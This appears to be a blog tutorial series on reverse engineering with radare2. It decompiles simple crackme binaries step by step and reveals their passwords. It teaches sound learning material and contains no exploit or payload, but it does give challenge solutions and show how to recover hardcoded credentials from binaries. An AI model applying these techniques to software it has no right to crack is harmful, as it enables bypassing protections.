│           ; var int local_104h @ rbp-0x104
│           ; var int local_100h @ rbp-0x100
│           ; var int local_1h @ rbp-0x1
│           ; UNKNOWN XREF from 0x00400470 (unk)
│           ; DATA XREF from 0x0040073d (entry0)
│           0x004008e3      55             push rbp
│           0x004008e4      4889e5         mov rbp, rsp
│           0x004008e7      4881ec200100.  sub rsp, 0x120
│           0x004008ee      89bdfcfeffff   mov dword [rbp - local_104h], edi
│           0x004008f4      4889b5f0feff.  mov qword [rbp - local_110h], rsi
│           0x004008fb      488995e8feff.  mov qword [rbp - local_118h], rdx
│           0x00400902      b800000000     mov eax, 0
│           0x00400907      e80affffff     call sym.banner
│           0x0040090c      bf9d0a4000     mov edi, str.Enter_Password: ; "Enter Password: " @ 0x400a9d
│           0x00400911      b800000000     mov eax, 0
│           0x00400916      e8e5fdffff     call sym.imp.printf
│           0x0040091b      488d8500ffff.  lea rax, [rbp - local_100h]
│           0x00400922      4889c6         mov rsi, rax
│           0x00400925      bfae0a4000     mov edi, str._255s          ; "%255s" @ 0x400aae
│           0x0040092a      b800000000     mov eax, 0
│           0x0040092f      e8dcfdffff     call sym.imp.__isoc99_scanf
│           0x00400934      c645ff00       mov byte [rbp - local_1h], 0
│           0x00400938      488d8500ffff.  lea rax, [rbp - local_100h]
│           0x0040093f      4889c7         mov rdi, rax
│           0x00400942      e808ffffff     call sym.checkPassword
│           0x00400947      84c0           test al, al
│       ┌─< 0x00400949      740c           je 0x400957
│       │   0x0040094b      bfb40a4000     mov edi, str.Password_accepted_ ; "Password accepted!" @ 0x400ab4
│       │   0x00400950      e88bfdffff     call sym.imp.puts
│      ┌──< 0x00400955      eb0a           jmp 0x400961
│      │└─> 0x00400957      bfc70a4000     mov edi, str.Wrong_         ; "Wrong!" @ 0x400ac7
│      │    0x0040095c      e87ffdffff     call sym.imp.puts
│      │    ; JMP XREF from 0x00400955 (sym.main)
│      └──> 0x00400961      b800000000     mov eax, 0
│           0x00400966      c9             leave
╘           0x00400967      c3             ret

(use eco without any parameters for a complete list). If this does not fits your need, you could also use random colors (ecr) or set the colors yourself (ec for a list of all available keys and ec <key> <frontcolor> (<backcolor>) eg. ec comment rgb:ffff00 blue (use ecs for supported colors)).

Besides the coloring, you’ll find various settings which affect the output of the disassembly in the asm configuration space. They allow you, for example, to customize the spacing between the different metadata of the disassembly (flow arrows, bytes, addresses, opcodes, comments,…) and also turning them on and off.

After you found some pleasing settings, let’s start with the current binary (btw, you can store option commands in the $HOME/.radare2rc file for persistence). After loading the binary into radare2 (r2 -AA ./challenge02), you should find yourself at the address 0x00400720. In case of some of you are wondering about why we are placed here and not at the main function, we’ll use different ways to get a clue. Assuming that we are currently placed inside or at the beginning of a function we could use the aficommand to give us some information about the function we are placed in:

[0x00400720]> afi
 offset: 0x00400720
 name: entry0
 size: 43
 realsz: 43
 stackframe: 0
 call-convention: @�adAV
 cyclomatic-complexity: 1
 bits: 64
 type: fcn [NEW]
 num-bbs: 1
 edges: 0
 end-bbs: 1
 data-refs: 0x004009e0 0x00400970 0x004008e3 0x00600ff0 
 args: 0
 diff: type: new


As you may notice, besides the other different information, we get the name of the current function which is entry0. This strongly indicates that we are currently placed at the entrypoint of the application, which typically sets some things up (like parsing the commandline, retrieving environment variables etc.) and calls the actual main function afterwards. To check this assumption, we’ll use the ie command to get the address of the entry point as specified in the file headers (elf64 in this case):

[0x00400720]> ie
vaddr=0x00400720 paddr=0x00000720 baddr=0x00400000 laddr=0x00000000 type=program

1 entrypoints


As you can see, the vaddr (virtual address) is matching the current position, so we are actually placed at the beginning of the entry point function.

Sidenote: the virtual address is most of the time a combination of the physical address (paddr; position in the binary) and the base address (baddr).


Let’s take a look at the disassembly of this function:


            ;-- section_end..plt:
            ;-- section..text:
            ;-- _start:
╒ (fcn) entry0 43
│           ; UNKNOWN XREF from 0x00400440 (unk)
│           0x00400720      31ed           xor ebp, ebp                ; [13] va=0x00400720 pa=0x00000720 sz=706 vsz=706 rwx=--r-x .text
│           0x00400722      4989d1         mov r9, rdx
│           0x00400725      5e             pop rsi
│           0x00400726      4889e2         mov rdx, rsp
│           0x00400729      4883e4f0       and rsp, 0xfffffffffffffff0
│           0x0040072d      50             push rax
│           0x0040072e      54             push rsp
│           0x0040072f      49c7c0e00940.  mov r8, sym.__libc_csu_fini ; sym.__libc_csu_fini
│           0x00400736      48c7c1700940.  mov rcx, sym.__libc_csu_init ; "AWAVA..AUATL.%.. " @ 0x400970
│           0x0040073d      48c7c7e30840.  mov rdi, sym.main           ; "UH..H.. ." @ 0x4008e3
│           0x00400744      ff15a6082000   call qword [rip + 0x2008a6] ; [0x600ff0:8]=0 LEA reloc.__libc_start_main_240 ; reloc.__libc_start_main_240
╘           0x0040074a      f4             hlt


After some stack setup between lines 0x400720 and 0x400729, some function is called in line 0x400744with the main function as the first parameter (mov rdi, sym.main) besides some other parameters. As you can see, the call is using a process counter relative addressing. This technique is typically used to produce position independent code (PIC) which is needed for the ASLR technique. As the rip is pointing to the next address to be executed, it will contain the address 0x40074a. This results in the address 0x600ff0(to calculate in radare2: ? 0x40074a+0x2008a6).

If we look into the sections of the binary (iS) we’ll see that this address belongs to the the .got section. This section contains the global object table (GOT) and is filled by the linker during load. It’s used as a jump table for library functions. Radare2 is also able to parse the relocation tables to tell us which functions will be mapped at runtime (ir command):


vaddr=0x00600ff0 paddr=0x00000ff0 type=SET_64 __libc_start_main
vaddr=0x00600ff8 paddr=0x00000ff8 type=SET_64 __gmon_start__
vaddr=0x00601018 paddr=0x00001018 type=SET_64 puts
vaddr=0x00601020 paddr=0x00001020 type=SET_64 strlen
vaddr=0x00601028 paddr=0x00001028 type=SET_64 printf
vaddr=0x00601030 paddr=0x00001030 type=SET_64 __isoc99_scanf

6 relocations

Therefore the __libc_start_main function will be called at runtime :)… Some of you may already noticed that radare is smart enough to provide this information to us in the comment at the call line ;).

Radare is also able to replace the mnemonic RIP-relative addressing with the target function name. To get this, you’ve to enable the asm.relsub option:

call qword [reloc.__libc_start_main_240] ; [0x600ff0:8]=0 LEA reloc.__libc_start_main_240 ; reloc.__libc_start_main_240


As the __libc_start_main function is a standard library function provided by the linux library =libc, we’ll jump directly into the main function (s sym.main).

This time, we’ll try to get a fast overview of the referenced flags in this function (strings, global variables, functions, etc.). To get a graph of the references, we have two options. The first one is to generate a graphviz graph by using agc $$ | xdot - ($$ is a variable containing the current address, sym.main in this case):

Reference Graph

The other option would be the ascii graph in the visual mode (we’ll come to this later) which you’ll get by executing VV and then pressing >. As this looks very similar to the last challenge, we could directly look into the checkPassword function. You can do this either by seeking to it (s sym.checkPassword) or in the visual graph view by pressing the tab key until the function is marked. After pressing q, you’ll be placed inside the function (press q multiple times if you want to return to the main interface).


As we want to take a look into some of the visual modes of radere2, we’ll stay in the graph mode this time (either by pressing q only once or by entering VV).

[0x0040084f]> VV @ sym.checkPassword (nodes 9 edges 11 zoom 100%) BB-NORM mouse:canvas-y movements-speed:5
                                  |  0x40084f                                   |
                                  | (fcn) sym.checkPassword 148                 |
                                  | ; var int local_28h @ rbp-0x28              |
                                  | ; var int local_1ch @ rbp-0x1c              |
                                  | ; var int local_18h @ rbp-0x18              |
                                  | ; var int local_14h @ rbp-0x14              |
                                  | ; var int local_10h @ rbp-0x10              |
                                  | ; var int local_4h @ rbp-0x4                |
                                  | push rbp                                    |
                                  | mov rbp, rsp                                |
                                  | sub rsp, 0x30                               |
                                  | mov qword [rbp - local_28h], rdi            |
                                  | mov qword [rbp - local_10h], str.Sup3rP4ss  |
                                  | mov rax, qword [rbp - local_10h]            |
                                  | mov rdi, rax                                |
                                  | call sym.imp.strlen ;[a]                    |
                                  | mov dword [rbp - local_14h], eax            |
                                  | mov rax, qword [rbp - local_28h]            |
                                  | mov rdi, rax                                |
                                  | call sym.imp.strlen ;[a]                    |
                                  | mov dword [rbp - local_18h], eax            |
                                  | mov eax, dword [rbp - local_14h]            |
                                  | cmp eax, dword [rbp - local_18h]            |
                                  | je 0x400890 ;[b]                            |
                                        t f
                           .------------' '------------------------------.
                           |                                             |
                           |                                             |
                     =-----------------------------------=       =--------------------=
                     |  0x400890                         |       |  0x400889          |
                     | mov eax, dword [rbp - local_14h]  |       | mov eax, 0         |
                     | mov dword [rbp - local_1ch], eax  |       | jmp 0x4008e1 ;[f]  |
                     | mov dword [rbp - local_4h], 0     |       =--------------------=
                     | jmp 0x4008d4 ;[c]                 |           v
                     =-----------------------------------=           |
                         v                                           '------.
                         |                                                  |
                         |                                                  |
                         .----------------.                                 |
                     =-----------------------------------=                  |
                     |  0x4008d4          |              |                  |
                     | mov eax, dword [rbp - local_4h]   |                  |
                     | cmp eax, dword [rbp - local_1ch]  |                  |
                     | jl 0x40089f ;[d]   |              |                  |
                     =-----------------------------------=                  |
                           t f            |                                 |
      .--------------------' '------------|-------------.                   |
      |                                   |             |                   |
      |                                   |             |                   |
=-----------------------------------=     |     =--------------------=      |
|  0x40089f                         |     |     |  0x4008dc          |      |
| mov eax, dword [rbp - local_4h]   |     |     | mov eax, 1         |      |
| movsxd rdx, eax                   |     |     =--------------------=      |
| mov rax, qword [rbp - local_28h]  |     |         v                       |
| add rax, rdx                      |     |         |                       |
| movzx edx, byte [rax]             |     |         |                       |
| mov eax, dword [rbp - local_1ch]  |     |         |                       |
| sub eax, 1                        |     |         |                       |
| sub eax, dword [rbp - local_4h]   |     |         |                       |
| movsxd rcx, eax                   |     |         |                       |
| mov rax, qword [rbp - local_10h]  |     |         |                       |
| add rax, rcx                      |     |         '-----------------.     |
| movzx eax, byte [rax]             |     |                           |     |
| cmp dl, al                        |     |                           |     |
| je 0x4008d0 ;[e]                  |     |                           |     |
=-----------------------------------=     |                           |     |
        f t                               |                           |     |
        '---.-------------------------.   |                           |     |
            |                         |   |                           |     |
            |                         |   |                           |     |
    =--------------------=      =-------------------------------=     |     |
    |  0x4008c9          |      |  0x4008d0                     |     |     |
    | mov eax, 0         |      | add dword [rbp - local_4h], 1 |     |     |
    | jmp 0x4008e1 ;[f]  |      =-------------------------------=     |     |
    =--------------------=          `-----'                           |     |
        v                                                             |     |
                                          |  0x4008e1          |
                                          | leave              |
                                          | ret                |


This graph is available in different versions, which can be cycled through by pressing p. The view we’ll focus on this time is the minimap view. You’ll get this view by pressing p until you’ll see a BB-SMALL in the first line of the output. It should look like this:

[0x0040084f]> VV @ sym.checkPassword (nodes 9 edges 11 zoom 100%) BB-SMALL mouse:canvas-y movements-speed:5                                   

(fcn) sym.checkPassword 148
; var int local_28h @ rbp-0x28
; var int local_1ch @ rbp-0x1c
; var int local_18h @ rbp-0x18
; var int local_14h @ rbp-0x14
; var int local_10h @ rbp-0x10
; var int local_4h @ rbp-0x4
push rbp
mov rbp, rsp
sub rsp, 0x30
mov qword [rbp - local_28h], rdi
mov qword [rbp - local_10h], str.Sup3rP4ss
mov rax, qword [rbp - local_10h]
mov rdi, rax
call sym.imp.strlen ;[a]                                                <@@@@@@>
mov dword [rbp - local_14h], eax                                           t f
mov rax, qword [rbp - local_28h]                                 .---------' '---------.
mov rdi, rax                                                     |                     |
call sym.imp.strlen ;[a]                                         |                     |
mov dword [rbp - local_18h], eax                              [_0890_]            [_0889_]
mov eax, dword [rbp - local_14h]                               v                   v
cmp eax, dword [rbp - local_18h]                               |                   |
je 0x400890 ;[b]                                               |                   |
                                                               .                   |
                                                              [_08d4_]             |
                                                               | t f               |
                                                       .-------|-' '---------.     |
                                                       |       |             |     |
                                                       |       |             |     |
                                                    [_089f_]   |        [_08dc_]   |
                                                         f t   |         v         |
                                                  .------' '--.|         '---.     |
                                                  |           ||             |     |
                                                  |           ||             |     |
                                             [_08c9_]      [_08d0_]          |     |
                                              v             `--'             |     |

This view shows you a minimap in the center and the current selected node as a disassembly on the upper left (the current node is marked with @@@@@@). This view helps us to focus on smaller blocks of a function, whilst always having the overview about the execution flow.

As we are now starting with reading the assembler code, I want to show you another nice feature for those of you who aren’t able to speak fluent assembler. Radare2 has an option to replace the assembler code by a pseudo code which is simpler to read (but sometimes not as detailed). To enable this feature, press : (colon, to open main shell) and enter e asm.pseudo = true. After leaving the shell again (press enter) you should see something like this:

(fcn) sym.checkPassword 148
; var int local_28h @ rbp-0x28
; var int local_1ch @ rbp-0x1c
; var int local_18h @ rbp-0x18
; var int local_14h @ rbp-0x14
; var int local_10h @ rbp-0x10
; var int local_4h @ rbp-0x4
push rbp
rbp = rsp
rsp -= 0x30
qword [rbp - local_28h] = rdi
qword [rbp - local_10h] = str.Sup3rP4ss
rax = qword [rbp - local_10h]
rdi = rax
sym.imp.strlen ()
dword [rbp - local_14h] = eax
rax = qword [rbp - local_28h]
rdi = rax
sym.imp.strlen ()
dword [rbp - local_18h] = eax
eax = dword [rbp - local_14h]
if (eax == dword [rbp - local_18h]
isZero 0x400890)

The first three lines are a typical function prologue. They create a backup of the rbp and reserve 48 bytes of memory on the stack. As you may noticed, radare2 displays constant values per default in a hexadecimal representation. Similar to IDA Pro, we are able to tell radare how we want to see a value at a specific position. Sadly it isn’t easily available in the graph view (yet?), but we can set it manually in the main shell. First we need the address of the the opcodes containing the value we want to change. We can get it for example by using pd 3 (which disassembles 3 opcodes from the current position). This would result in 0x00400853. To tell radare that we want to get the value in decimal, we enter ahi d @ 0x00400853. This stands for analysis hints intermediate, decimal at the address 0x00400853.

As we know from the last challenge, the function checkPassword gets one argument and returns if it contains the correct password. Currently, radare2 not detected that the function has an argument. Let’s tell it to do so. The command afvr rdi password const char* tells radare2 that the rdi register is used at an argument with the name password of the type const char* (based on the System V AMD64 ABI). This means that the local variable local_28h is a pointer to the entered password. Therefore we change the name and the type of the variable (afvn local_28h password_1 and afvbt password_1 const char*). The next line indicates that local_10h points to the string we compare with (I rename it to targetPassword). As rdi is always used in the amd64 ABI as the first argument, it becomes confusing as it is now aliased to password in the function disassembly. That’s why I prefer to leave it after I followed the dataflow (remove the alias by afvr- password).

This means that the next 8 lines calculate the length of the different strings and stores them in local_14hand local_18h respectively. Your current disassembly should look now close to this:

(fcn) sym.checkPassword 148
; var const char* password_1 @ rbp-0x28
; var int local_1ch @ rbp-0x1c
; var int inputPwdLength @ rbp-0x18
; var int targetPwdLength @ rbp-0x14
; var const char* targetPassword @ rbp-0x10
; var int local_4h @ rbp-0x4
; UNKNOWN XREF from 0x004004b8 (unk)
; CALL XREF from 0x00400942 (sym.main)
push rbp
rbp = rsp
rsp -= 48
qword [rbp - password_1] = rdi
qword [rbp - targetPassword] = str.Sup3rP4ss
rax = qword [rbp - targetPassword]
rdi = rax
sym.imp.strlen ()
dword [rbp - targetPwdLength] = eax
rax = qword [rbp - password_1]
rdi = rax
sym.imp.strlen ()
dword [rbp - inputPwdLength] = eax
eax = dword [rbp - targetPwdLength]
if (eax == dword [rbp - inputPwdLength]
isZero 0x400890)

If we directly translate what we have so far, we get:

int checkPassword(const char* password) {
    const char* password_1 = password;
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password_1);
    if(targetPwdLength == inputPwdLength) {

Let’s check what happens if the both lengths are not equal (you might already have a strong guess based on the minimap 😉 ). In the graph view you can simply press f or t to follow the true or the false branch. Pressing f brings us to a very small node. This node simply sets eax to zero and then jumps to 0x4008e1. To follow this jump, you can press g and the character(s) behind this jump (f in my case). What now happened in my current version of radare2 is that I’ve got an empty disassembly in the top left. This is one of the situations where the pseudo syntax misses some instructions. After disabling it (e asm.pseudo = false), you’ll see the instructions leave and ret. Those instructions tell the CPU to restore the stack based on the stored registers and jump back to the code which called the current function. In combination with the previous eax line, we have:

int checkPassword(const char* password) {
    const char* password_1 = password;
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password_1);
    if(targetPwdLength == inputPwdLength) {
    } else {
        return 0;

Current state: 3 blocks decompiled (0x4084f, 0x40889 and 0x408e1).

Let’s continue with the next one (the true case of the comparison).

Sidenote: You can always navigate through the blocks by using tab and TAB (shift+tab)

This block consists of three instructions which take a copy of the targetPwdLength variable and set another variable to zero. This is a typical intro of a loop which sets up the counter variable(s). If we take a look on the minimap, we can see that this is actually the intro to a loop (this block jumps to block 0x4008d4 and block 0x408d0 also jumps back to block 0x4008d4). So let’s rename the variables accordingly (another block finished 🙂 ).

The next one is again a small one. It compares the counter variable to the copy of the length. If it is lower, it seems to continue with another check (based on the minimap) if not, it goes to a block which ends up in the function epilog. I’ll go with this one first as it seems to be a quick one… It stores the value on into eax, which means that the function returns true. Our current decompiled code:

int checkPassword(const char* password) {
    const char* password_1 = password;
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password_1);
    if(targetPwdLength == inputPwdLength) {
        int counter = 0;
        int length = targetPwdLength;
        while(counter < length) {
        return 1;
    } else {
        return 0;

The true block is a larger one with some calculations and one comparison:

eax = dword [rbp - counter]
rdx = eax
rax = qword [rbp - password_1]
rax += rdx
edx = byte [rax]
eax = dword [rbp - length]
eax -= 1
eax -= dword [rbp - counter]
rcx = eax
rax = qword [rbp - targetPassword]
rax += rcx
eax = byte [rax]
if (dl == al
isZero 0x4008d0)


The first five lines store the character from the password_1 array at a position based on the current counter value. The next lines simply takes a character from the targetPassword array, but this time counting from the end. Those values are then compared for equality. Again, let’s check the inequality case: zero is stored in eax and the function returns false. The true case simply increments the counter by one and starts over at the block 0x408d4.

We are now able to decompile all blocks of the function:

int checkPassword(const char* password) {
    const char* password_1 = password;
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password_1);
    if(targetPwdLength == inputPwdLength) {
        int counter = 0;
        int length = targetPwdLength;
        while(counter < length) {
            if(password_1[counter] == targetPassword[length-1-counter]) {
                counter += 1;
            } else {
                return 0;
        return 1;
    } else {
        return 0;

Or after some manual reordering:

int checkPassword(const char* password) {
    const char* targetPassword = "Sup3rP4ss";
    int targetPwdLength = strlen(targetPassword);
    int inputPwdLength = strlen(password);
    if(targetPwdLength != inputPwdLength) {
        return 0;

    for(int counter = 0; counter < targetPwdLength; counter++) {
        if(password[counter] != targetPassword[targetPwdLength - 1 - counter])
            return 0;
    return 1;

Have a clue what this function does?

  1. It checks if the entered password is as long as the required password
  2. It compares the entered password with the reverse of “Sup3rP4ss”

This means our required password is “ss4Pr3puS” :

$ ./challenge02
#          Challenge 2           #
#                                #
#      (c) 2016 Timo Schmid      #
Enter Password: ss4Pr3puS
Password accepted!

That’s it!

The last command I would like to show you today is the experimental pseudo code feature:

[0x004008d0]> pdc
function sym.checkPassword () {

  ; UNKNOWN XREF from 0x004004b8 (unk)
  ; CALL XREF from 0x00400942 (sym.main)
  push rbp
  rbp = rsp
  rsp -= 0x30
  qword [rbp - password_1] = password
  qword [rbp - targetPassword] = 0x400a93
  rax = qword [rbp - targetPassword]
  password = rax
  0x4006f0 ()                    ; sym.imp.strlen
  dword [rbp - targetPwdLength] = eax
  rax = qword [rbp - password_1]
  password = rax
  0x4006f0 ()                    ; sym.imp.strlen
  dword [rbp - inputPwdLength] = eax
  eax = dword [rbp - targetPwdLength]
  if (eax == dword [rbp - inputPwdLength]
  isZero 0x400890) {

      eax = dword [rbp - targetPwdLength]
      dword [rbp - length] = eax
      dword [rbp - counter] = 0
      goto 0x4008d4
       do {

          ; JMP XREF from 0x0040089d (sym.checkPassword)
          eax = dword [rbp - counter]
          if (eax == dword [rbp - length]
          jl 0x40089f 
           } while (?);
       } while (?);

It’s currently very incomplete in terms of instruction coverage, but it shows where radare2 features might go in the future (there was a GSoC running which started to create a radare2 based decompiler named radeco).

Challenge 0x03

You will find the next challenge here (linux64 dynamically linked, linux64 statically linked, win64):


MD5 (challenge03) = 748f98ced3ca0b9178f8d85cdcc9d750
MD5 (challenge03.exe) = 2a1dde4f0de546216779394ce8960aa5
MD5 (challenge03-static) = 8c48ac034d6cefe135e9f22d6431e930
SHA1 (challenge03) = 0a2317bfb952f64dcd8ca50d2a084275cf8e7816
SHA1 (challenge03.exe) = 1c00a49d1c2249cb528a06c08cce1d15b062f59c
SHA1 (challenge03-static) = 78fcffdbe56d1cea29723df30dc14dfe6baf101f
SHA256 (challenge03) = 00f7662f22a3d305575a0117ea17b8d7801c133ffa2201986d62ebade65bdbf7
SHA256 (challenge03.exe) = 0c4a760a4a8653c4a26d07e0970a3ef7474cbdb53596166a670f5c08453eb57e
SHA256 (challenge03-static) = cbea4018b2451e84b789bd909f892f77486e8d42aee659e175da942a555c97ae

The goal is again to find the correct password for the login into the binary. Next time, I’ll give you a walkthrough for the third challenge and challenge #4.

Happy reversing!

Reverse Engineering With Radare2 – Part 1

Welcome back to the radare2 reversing tutorials. If you’ve missed the intro, you can find it here.

The last time you got the challenge01 binary and your goal was to find the password for the login. Let’s see how the application looks like:

$ ./challenge01
#          Challenge 1           #
#                                #
#      (c) 2016 Timo Schmid      #
Enter Password: test

The first and simplest step would be to look for strings inside the binary. We could do this either by using the unix utility strings or the binary analyzing binary from radare rabin2:

$ rabin2 -z ./challenge01
vaddr=0x00400a68 paddr=0x00000a68 ordinal=000 sz=35 len=34 section=.rodata type=ascii string=##################################
vaddr=0x00400a90 paddr=0x00000a90 ordinal=001 sz=35 len=34 section=.rodata type=ascii string=#          Challenge 1           #
vaddr=0x00400ab8 paddr=0x00000ab8 ordinal=002 sz=35 len=34 section=.rodata type=ascii string=#                                #
vaddr=0x00400ae0 paddr=0x00000ae0 ordinal=003 sz=35 len=34 section=.rodata type=ascii string=#      (c) 2016 Timo Schmid      #
vaddr=0x00400b03 paddr=0x00000b03 ordinal=004 sz=9 len=8 section=.rodata type=ascii string=p4ssw0rd
vaddr=0x00400b0c paddr=0x00000b0c ordinal=005 sz=11 len=10 section=.rodata type=ascii string=n0p4ssw0rd
vaddr=0x00400b17 paddr=0x00000b17 ordinal=006 sz=17 len=16 section=.rodata type=ascii string=Enter Password: 
vaddr=0x00400b28 paddr=0x00000b28 ordinal=007 sz=6 len=5 section=.rodata type=ascii string=%255s
vaddr=0x00400b2e paddr=0x00000b2e ordinal=008 sz=19 len=18 section=.rodata type=ascii string=Password accepted!
vaddr=0x00400b41 paddr=0x00000b41 ordinal=009 sz=7 len=6 section=.rodata type=ascii string=Wrong!

Two strings look interesting: “p4ssw0rd” and “n0p4ssw0rd”. Obviously, we could try both of them if one works, but as this is a reversing tutorial, we’ll figure it out in more depth 😉

So after loading the binary into radare (r2 ./challenge01) and do some anlysis (aaa) we’ll start by looking at the main function of the binary. As radare2 seeks to the entry point, we have to seek to the main function first.


As we can see in the output above, the main function contains several calls. Some of them are calling (imported) library functions which are named after the scheme sym.imp.<function name>. As this is a x64 binary on a linux system, it is using the System V AMD64 ABI for the calling conventions. This means that the first argument is placed in the rdi register, the second in the rsi, third in rdx, forth rcx, fifth r8 and sixth r9 register. A stack buffer is seemed to also be used as the rsp register is decremented by 0x120, which allocates 288 bytes on the stack. After that, the registers edirsi and rdx are stored on the stack (maybe as backup). After the call to the banner function, a pointer to the string “Enter Password: ” is stored in edi which means in the first argument for the next function call (printf in this case). The next call (scanf) takes the arguments “%255s” and a pointer to the stack. Based on the information shown by radare, the pointer is pointing at position rdp-0x100 which means that it points at a 256 byte buffer on the current stack frame (0x100 = 256 and the last byte is set to zero after the call). Now it become interesting as the pointer to the buffer is given to the checkPassword function as the first argument. The return value of this function (al) is checked if it is zero or not. If it contains zero, the jump at 0x4009c0 will be taken to the address 0x4009ce and “Wrong!” will be printed. Otherwise “Password accepted!”.

Let’s take a look at the checkPassword function:


As we can see here, our argument is stored on the stack (at local_18h) after that it is read again to be passed to the strlen function. The result of this function is then used as the third argument to the strncmpfunction. The first argument is our input string and the second argument is …. “n0p4ssw0rd”. This means that the searched password is “n0p4ssw0rd” 🙂 :

$ ./challenge01
#          Challenge 1           #
#                                #
#      (c) 2016 Timo Schmid      #
Enter Password: n0p4ssw0rd
Password accepted!

Challenge solved!

Challenge 0x02

You will find the next challenge here (linux64 dynamically linked, linux64 statically linked, win64):


MD5 (challenge02) = 2b26165a67274fca1d23959675114444
MD5 (challenge02.exe) = 5bc1f2451d62ff33b2128185a32cdc9b
MD5 (challenge02-static) = 34ab5bb11a095383c121aecbb689767a
SHA1 (challenge02) = 34c8bb9de8f1c78dbe45edc80c7cedbc176b38a9
SHA1 (challenge02.exe) = 07522e7e3c6444bd3dfae1061d442551b23c6ae6
SHA1 (challenge02-static) = 99d0eac08903ff3d7404d4edb3ea7e6ae524b9d6
SHA256 (challenge02) = 3b743b588e21bb0623a45a39ae34f388d1cf292a96489cfe39a590e769ee6750
SHA256 (challenge02.exe) = f8eeee8c16a121d42915a69a64c3cd32d70b233d512587dc9534db7f7fea0a14
SHA256 (challenge02-static) = 5df7c7aa6bbddf141e0127070e170a3650c45a2586d4bb85250633f0264b9f39

The goal is again to find the correct password for the login into the binary. Next time I’ll give you a walkthrough for the second challenge and challenge #3.

Happy reversing!

Reverse Engineering With Radare2 – Intro

As some of you may know, there is a “new” reverse engineering toolkit out there which tries to compete with IDA Pro in terms of reverse engineering. I’m talking about radare2, a framework for reversing, patching, debugging and exploiting.

It has large scripting capabilities, runs on all major plattforms (Android, GNU/Linux, [Net|Free|Open]BSD, iOS, OSX, QNX, w32, w64, Solaris, Haiku, FirefoxOS and even on your pebble smartwatch 😉 ) and is free.

Sadly, I had some problems finding good tutorials on how to use it, as the interface is currently a bit cumbersome. After fiddling around, I’ve decided to create a little tutorial series where we can learn together ;).

I will publish one binary per post and you will have time to reverse it till the next blog post is published (most of the time you have to find which data you have to enter to make the binary happy).

So let’s start 🙂


The most advisable way is to use the most current version from the github repository:


(As taken from the README:)

The easiest way to install radare2 from git is by running the following command:

$ sys/install.sh

If you want to install radare2 in the home directory without using root privileges and sudo, simply run:

$ sys/user.sh


If everything goes well, you’ll find multiple tools in your path:

  • r2 – the “main” binary
  • rabin2 – binary to analyze files (list imports, exports, strings, …)
  • rax2 – binary to convert between data formats
  • radiff2 – binary to do some diffing
  • rahash2 – creates hashes from file blocks (and whole file)
  • rasm2 – helps to play with assembler instructions

The default interface for radare2 is the command line. Just type

r2 your_binary

to start it. Radare has a very shortened command syntax (it is always logical, but in my opinion a few more characters wouldn’t hurt). So to start the analysis of your file, type aa (for analyze all; use aaa or aaaa to run even more analysis algorithms). Did you already get the idea behind the commands? Radare uses a tree structure like name of the commands so all commands which corresponds to analyzing something start with a. If you want to print something you have to use…. p. For example disassemble the current function: pdf (print disassembly function).

As no human could remember all available commands in radare (there are many of them), the ? character is used to display context sensitive help text. A single ? shows you which command categories are available and some general help about specifying addresses and data. A p? shows you the help about the different print commands, pd? which commands are available for printing disassemblies of different sources, etc.

An important command to walk through your targets is the seek command. By using

s sym.main

you’ll jumping into the main function (as long as you’d analyzed the binary in the first step and symbols are available). The following shows you the output of the pdf command after seeking to the main function of the /bin/true binary.

            ;-- section_end..plt:
            ;-- section..text:
/ (fcn) main 160
|           ; DATA XREF from 0x0040142d (main)
|           0x00401370      83ff02         cmp edi, 2                  ; [12] va=0x00401370 pa=0x00001370 sz=11465 vsz=11465 rwx=--r-x .text
|       ,=< 0x00401373      7403           je 0x401378                
|       |   0x00401375      31c0           xor eax, eax
|       |   0x00401377      c3             ret
|       `-> 0x00401378      53             push rbx
|           0x00401379      488b3e         mov rdi, qword [rsi]
|           0x0040137c      4889f3         mov rbx, rsi
|           0x0040137f      e84c050000     call fcn.004018d0
|           0x00401384      be6d404000     mov esi, 0x40406d
|           0x00401389      bf06000000     mov edi, 6
|           0x0040138e      e81dffffff     call sym.imp.setlocale
|           0x00401393      bef6404000     mov esi, str._usr_share_locale ; "/usr/share/locale" @ 0x4040f6
|           0x00401398      bfe8404000     mov edi, 0x4040e8           ; "coreutils" @ 0x4040e8
|           0x0040139d      e86efdffff     call sym.imp.bindtextdomain
|           0x004013a2      bfe8404000     mov edi, 0x4040e8           ; "coreutils" @ 0x4040e8
|           0x004013a7      e844fdffff     call sym.imp.textdomain
|           0x004013ac      bf20184000     mov edi, 0x401820
|           0x004013b1      e85a2c0000     call fcn.00404010
|           0x004013b6      488b5b08       mov rbx, qword [rbx + 8]    ; [0x8:8]=0
|           0x004013ba      be08414000     mov esi, str.__help         ; "--help" @ 0x404108
|           0x004013bf      4889df         mov rdi, rbx
|           0x004013c2      e839feffff     call sym.imp.strcmp
|           0x004013c7      85c0           test eax, eax
|       ,=< 0x004013c9      743b           je 0x401406                
|       |   0x004013cb      be0f414000     mov esi, str.__version      ; "--version" @ 0x40410f
|       |   0x004013d0      4889df         mov rdi, rbx
|       |   0x004013d3      e828feffff     call sym.imp.strcmp
|       |   0x004013d8      85c0           test eax, eax
|      ,==< 0x004013da      7526           jne 0x401402               
|      ||   0x004013dc      488b0dcd4d20.  mov rcx, qword [rip + 0x204dcd] ; [0x6061b0:8]=0x404383 str.8.25
|      ||   0x004013e3      488b3d3e4e20.  mov rdi, qword [rip + 0x204e3e] ; [0x606228:8]=0x2029554e4728203a  LEA obj.stdout ; ": (GNU) 5.3.0" @ 0x606228
|      ||   0x004013ea      4531c9         xor r9d, r9d
|      ||   0x004013ed      41b819414000   mov r8d, str.Jim_Meyering   ; "Jim Meyering" @ 0x404119
|      ||   0x004013f3      bae4404000     mov edx, str.GNU_coreutils  ; "GNU coreutils" @ 0x4040e4
|      ||   0x004013f8      be64404000     mov esi, str.true           ; "true" @ 0x404064
|      ||   0x004013fd      e86e220000     call fcn.00403670
|      `--> 0x00401402      31c0           xor eax, eax
|       |   0x00401404      5b             pop rbx
|       |   0x00401405      c3             ret
|       `-> 0x00401406      31ff           xor edi, edi
|           0x00401408      e803010000     call fcn.00401510
\           0x0040140d      0f1f00         nop dword [rax]

